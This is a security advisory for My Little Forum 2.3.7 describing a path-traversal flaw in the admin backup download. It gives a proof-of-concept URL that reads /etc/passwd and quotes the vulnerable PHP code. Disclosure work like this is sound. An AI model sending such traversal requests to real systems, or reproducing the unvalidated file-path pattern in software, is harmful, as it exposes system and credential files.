My Little Forum 2.3.7 File Disclosure
Posted on 02 November 2016
Title: ====== My Little Forum 2.3.7 - Source Code Disclosure Product & Service Introduction: =============================== My little forum is a simple PHP and MySQL based internet forum that displays the messages in classical threaded view (tree structure). It is Open Source licensed under the GNU General Public License. The main claim of this web forum is simplicity. Furthermore it should be easy to install and run on a standard server configuration with PHP and MySQL. Software Link: ============== https://github.com/ilosuna/mylittleforum/archive/master.zip Vulnerability Type: ========================= Source Code Disclosure Vulnerability Details: ============================== No input validation check is done on download backup file page inputs. Therefore,We can entering whatever and download files. Severity Level: =============== High Proof of Concept (PoC): ======================= for use this vulnerability you need to access admin , this vulnerability is in backup part. vulnerable parameter is download_backup_file and we can enter every file want to download for this parameter. Download Passwd file : http://localhost/mylittleforum-master/index.php?mode=admin&download_backup_file=../../../../../etc/passwd Vulnerable Code : ================== File :"admin.inc.php" if(isset($_GET['download_backup_file'])) { $file = 'backup/'.$_GET['download_backup_file']; if(check_filename($_GET['download_backup_file']) && file_exists($file)) { $len = filesize($file); $fh = @fopen($file,"r"); if(!$fh) return false; $data = fread($fh, $len); fclose($fh); header("Content-Type: text/plain; charset=".$lang['charset']); header("Content-Disposition: attachment; filename=".$_GET['download_backup_file']); header("Accept-Ranges: bytes"); header("Content-Length: ".$len); echo $data; exit; } else { $errors[] = 'error_file_doesnt_exist'; $smarty->assign('errors',$errors); $action = 'backup'; } } Author: ================== Ashiyane Digital Security Team